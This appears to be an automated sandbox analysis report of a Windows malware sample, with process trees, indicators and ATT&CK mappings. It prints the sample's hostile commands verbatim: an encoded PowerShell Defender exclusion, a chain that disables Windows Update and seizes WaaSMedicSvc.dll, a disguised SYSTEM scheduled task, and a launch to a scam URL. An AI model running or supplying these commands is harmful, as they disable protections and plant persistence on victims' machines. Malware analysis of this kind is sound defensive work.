5057345a9713e4e81ad0cea8602b114d12a3ee3dedfbdf068679dab58baf6d44

System Information Discovery

Processes:

setup.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	setup.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

Processes:

be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266.exe

Drops startup file 2 IoCs

Processes:

cmd.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lol.bat	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lol.bat	cmd.exe

Modifies file permissions 1 TTPs 2 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

takeown.exeicacls.exe

pid process

3216 takeown.exe
4600 icacls.exe

pid	process
3216	takeown.exe
4600	icacls.exe

Themida packer 6 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Windows\Temp\setup.exe	themida
C:\Windows\Temp\setup.exe	themida
behavioral2/memory/4600-135-0x0000000000400000-0x00000000010BD000-memory.dmp	themida
behavioral2/memory/4600-138-0x0000000000400000-0x00000000010BD000-memory.dmp	themida
behavioral2/memory/4600-152-0x0000000000400000-0x00000000010BD000-memory.dmp	themida
behavioral2/memory/4600-157-0x0000000000400000-0x00000000010BD000-memory.dmp	themida

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

setup.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA setup.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

setup.exe

pid process

4600 setup.exe
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

1384 sc.exe
1672 sc.exe
3548 sc.exe
3348 sc.exe
3108 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

4144 schtasks.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	setup.exe

pid	process
4600	setup.exe

pid	process
1384	sc.exe
1672	sc.exe
3548	sc.exe
3348	sc.exe
3108	sc.exe

pid	process
4144	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

Processes:

msedge.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Modifies registry class 1 IoCs

Processes:

msedge.exe

description ioc process

Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe
Modifies registry key 1 TTPs 9 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid process

3904 reg.exe
2288 reg.exe
4804 reg.exe
1468 reg.exe
3352 reg.exe
2052 reg.exe
2384 reg.exe
4336 reg.exe
1336 reg.exe
Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

msedge.exemsedge.exepowershell.execonhost.exe

pid process

3928 msedge.exe
3928 msedge.exe
3356 msedge.exe
3356 msedge.exe
1976 powershell.exe
1976 powershell.exe
3628 conhost.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

Processes:

msedge.exe

pid process

3356 msedge.exe
3356 msedge.exe
3356 msedge.exe
3356 msedge.exe
3356 msedge.exe
3356 msedge.exe
3356 msedge.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

pid	process
3904	reg.exe
2288	reg.exe
4804	reg.exe
1468	reg.exe
3352	reg.exe
2052	reg.exe
2384	reg.exe
4336	reg.exe
1336	reg.exe

pid	process
3928	msedge.exe
3928	msedge.exe
3356	msedge.exe
3356	msedge.exe
1976	powershell.exe
1976	powershell.exe
3628	conhost.exe

pid	process
3356	msedge.exe
3356	msedge.exe
3356	msedge.exe
3356	msedge.exe
3356	msedge.exe
3356	msedge.exe
3356	msedge.exe

Suspicious use of AdjustPrivilegeToken 11 IoCs

Processes:

powershell.exepowercfg.exepowercfg.execonhost.exepowercfg.exepowercfg.exetakeown.exe

description	pid	process
Token: SeDebugPrivilege	1976	powershell.exe
Token: SeShutdownPrivilege	2608	powercfg.exe
Token: SeCreatePagefilePrivilege	2608	powercfg.exe
Token: SeShutdownPrivilege	2480	powercfg.exe
Token: SeCreatePagefilePrivilege	2480	powercfg.exe
Token: SeDebugPrivilege	3628	conhost.exe
Token: SeShutdownPrivilege	2960	powercfg.exe
Token: SeCreatePagefilePrivilege	2960	powercfg.exe
Token: SeShutdownPrivilege	4548	powercfg.exe
Token: SeCreatePagefilePrivilege	4548	powercfg.exe
Token: SeTakeOwnershipPrivilege	3216	takeown.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

msedge.exe

pid process

3356 msedge.exe
3356 msedge.exe

pid	process
3356	msedge.exe
3356	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266.execmd.exemsedge.exe

description	pid	process	target process
PID 4872 wrote to memory of 4600	4872	be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266.exe	setup.exe
PID 4872 wrote to memory of 4600	4872	be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266.exe	setup.exe
PID 4872 wrote to memory of 4884	4872	be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266.exe	cmd.exe
PID 4872 wrote to memory of 4884	4872	be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266.exe	cmd.exe
PID 4872 wrote to memory of 4884	4872	be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266.exe	cmd.exe
PID 4872 wrote to memory of 4904	4872	be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266.exe	cmd.exe
PID 4872 wrote to memory of 4904	4872	be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266.exe	cmd.exe
PID 4872 wrote to memory of 4904	4872	be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266.exe	cmd.exe
PID 4904 wrote to memory of 3356	4904	cmd.exe	msedge.exe
PID 4904 wrote to memory of 3356	4904	cmd.exe	msedge.exe
PID 3356 wrote to memory of 544	3356	msedge.exe	msedge.exe
PID 3356 wrote to memory of 544	3356	msedge.exe	msedge.exe
PID 3356 wrote to memory of 3772	3356	msedge.exe	msedge.exe
PID 3356 wrote to memory of 3772	3356	msedge.exe	msedge.exe
PID 3356 wrote to memory of 3772	3356	msedge.exe	msedge.exe
PID 3356 wrote to memory of 3772	3356	msedge.exe	msedge.exe
PID 3356 wrote to memory of 3772	3356	msedge.exe	msedge.exe
PID 3356 wrote to memory of 3772	3356	msedge.exe	msedge.exe
PID 3356 wrote to memory of 3772	3356	msedge.exe	msedge.exe
PID 3356 wrote to memory of 3772	3356	msedge.exe	msedge.exe
PID 3356 wrote to memory of 3772	3356	msedge.exe	msedge.exe
PID 3356 wrote to memory of 3772	3356	msedge.exe	msedge.exe
PID 3356 wrote to memory of 3772	3356	msedge.exe	msedge.exe
PID 3356 wrote to memory of 3772	3356	msedge.exe	msedge.exe
PID 3356 wrote to memory of 3772	3356	msedge.exe	msedge.exe
PID 3356 wrote to memory of 3772	3356	msedge.exe	msedge.exe
PID 3356 wrote to memory of 3772	3356	msedge.exe	msedge.exe
PID 3356 wrote to memory of 3772	3356	msedge.exe	msedge.exe
PID 3356 wrote to memory of 3772	3356	msedge.exe	msedge.exe
PID 3356 wrote to memory of 3772	3356	msedge.exe	msedge.exe
PID 3356 wrote to memory of 3772	3356	msedge.exe	msedge.exe
PID 3356 wrote to memory of 3772	3356	msedge.exe	msedge.exe
PID 3356 wrote to memory of 3772	3356	msedge.exe	msedge.exe
PID 3356 wrote to memory of 3772	3356	msedge.exe	msedge.exe
PID 3356 wrote to memory of 3772	3356	msedge.exe	msedge.exe
PID 3356 wrote to memory of 3772	3356	msedge.exe	msedge.exe
PID 3356 wrote to memory of 3772	3356	msedge.exe	msedge.exe
PID 3356 wrote to memory of 3772	3356	msedge.exe	msedge.exe
PID 3356 wrote to memory of 3772	3356	msedge.exe	msedge.exe
PID 3356 wrote to memory of 3772	3356	msedge.exe	msedge.exe
PID 3356 wrote to memory of 3772	3356	msedge.exe	msedge.exe
PID 3356 wrote to memory of 3772	3356	msedge.exe	msedge.exe
PID 3356 wrote to memory of 3772	3356	msedge.exe	msedge.exe
PID 3356 wrote to memory of 3772	3356	msedge.exe	msedge.exe
PID 3356 wrote to memory of 3772	3356	msedge.exe	msedge.exe
PID 3356 wrote to memory of 3772	3356	msedge.exe	msedge.exe
PID 3356 wrote to memory of 3772	3356	msedge.exe	msedge.exe
PID 3356 wrote to memory of 3772	3356	msedge.exe	msedge.exe
PID 3356 wrote to memory of 3772	3356	msedge.exe	msedge.exe
PID 3356 wrote to memory of 3772	3356	msedge.exe	msedge.exe
PID 3356 wrote to memory of 3772	3356	msedge.exe	msedge.exe
PID 3356 wrote to memory of 3772	3356	msedge.exe	msedge.exe
PID 3356 wrote to memory of 3928	3356	msedge.exe	msedge.exe
PID 3356 wrote to memory of 3928	3356	msedge.exe	msedge.exe
PID 3356 wrote to memory of 4132	3356	msedge.exe	msedge.exe
PID 3356 wrote to memory of 4132	3356	msedge.exe	msedge.exe
PID 3356 wrote to memory of 4132	3356	msedge.exe	msedge.exe
PID 3356 wrote to memory of 4132	3356	msedge.exe	msedge.exe
PID 3356 wrote to memory of 4132	3356	msedge.exe	msedge.exe
PID 3356 wrote to memory of 4132	3356	msedge.exe	msedge.exe
PID 3356 wrote to memory of 4132	3356	msedge.exe	msedge.exe
PID 3356 wrote to memory of 4132	3356	msedge.exe	msedge.exe
PID 3356 wrote to memory of 4132	3356	msedge.exe	msedge.exe
PID 3356 wrote to memory of 4132	3356	msedge.exe	msedge.exe

C:\Users\Admin\AppData\Local\Temp\be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266.exe
"C:\Users\Admin\AppData\Local\Temp\be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4872

C:\Windows\Temp\setup.exe
"C:\Windows\Temp\setup.exe"
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4600

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Windows\Temp\setup.exe"
3⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3628

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGMAYgB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAZwBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAegBsACMAPgA="
4⤵
PID:5024

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAGMAYgB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAZwBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAegBsACMAPgA="
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1976

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '^"C:\Program Files\Chrome\updater.exe^"'
4⤵
PID:3700

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '"C:\Program Files\Chrome\updater.exe"'
5⤵
- Creates scheduled task(s)
PID:4144

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
4⤵
PID:2756

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
PID:4124

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
5⤵
PID:2680

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
5⤵
PID:2060

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
5⤵
PID:3068

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
5⤵
PID:3920

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
5⤵
PID:4924

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
5⤵
PID:3220

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
5⤵
PID:532

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:4804

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:1468

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:3352

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:4336

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
4⤵
PID:4620

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Windows\Temp\run.bat" "
2⤵
- Drops startup file
PID:4884

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Windows\Temp\lol.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:4904

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://take-realprize.life/?u=lq1pd08&o=hdck0gl
3⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3356

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffecd2146f8,0x7ffecd214708,0x7ffecd214718
4⤵
PID:544

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,14739173038681984170,17221224849975373888,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:2
4⤵
PID:3772

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,14739173038681984170,17221224849975373888,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2384 /prefetch:3
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3928

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,14739173038681984170,17221224849975373888,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2676 /prefetch:8
4⤵
PID:4132

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,14739173038681984170,17221224849975373888,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1
4⤵
PID:3672

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,14739173038681984170,17221224849975373888,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:1
4⤵
PID:1456

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2140,14739173038681984170,17221224849975373888,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5392 /prefetch:8
4⤵
PID:616

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,14739173038681984170,17221224849975373888,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1444 /prefetch:1
4⤵
PID:1452

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,14739173038681984170,17221224849975373888,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6000 /prefetch:1
4⤵
PID:1120

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,14739173038681984170,17221224849975373888,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4760 /prefetch:1
4⤵
PID:4220

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,14739173038681984170,17221224849975373888,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6008 /prefetch:1
4⤵
PID:1652

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,14739173038681984170,17221224849975373888,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3552 /prefetch:1
4⤵
PID:4944

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1152

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2608

C:\Windows\system32\sc.exe
sc stop bits
1⤵
- Launches sc.exe
PID:1384

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2960

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
1⤵
- Modifies registry key
PID:2052

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
1⤵
- Modifies registry key
PID:3904

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
1⤵
- Modifies registry key
PID:2288

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
1⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4600

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
1⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3216

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
1⤵
- Modifies registry key
PID:1336

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
1⤵
- Modifies security service
- Modifies registry key
PID:2384

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4548

C:\Windows\system32\sc.exe
sc stop dosvc
1⤵
- Launches sc.exe
PID:1672

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2480

C:\Windows\system32\sc.exe
sc stop wuauserv
1⤵
- Launches sc.exe
PID:3548

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
1⤵
- Launches sc.exe
PID:3348

C:\Windows\system32\sc.exe
sc stop UsoSvc
1⤵
- Launches sc.exe
PID:3108

C:\Windows\system32\schtasks.exe
schtasks /run /tn "GoogleUpdateTaskMachineQC"
1⤵
PID:3740

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

Scheduled Task

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File and Directory Permissions Modification

Impair Defenses

Modify Registry

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

4

System Information Discovery

5

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop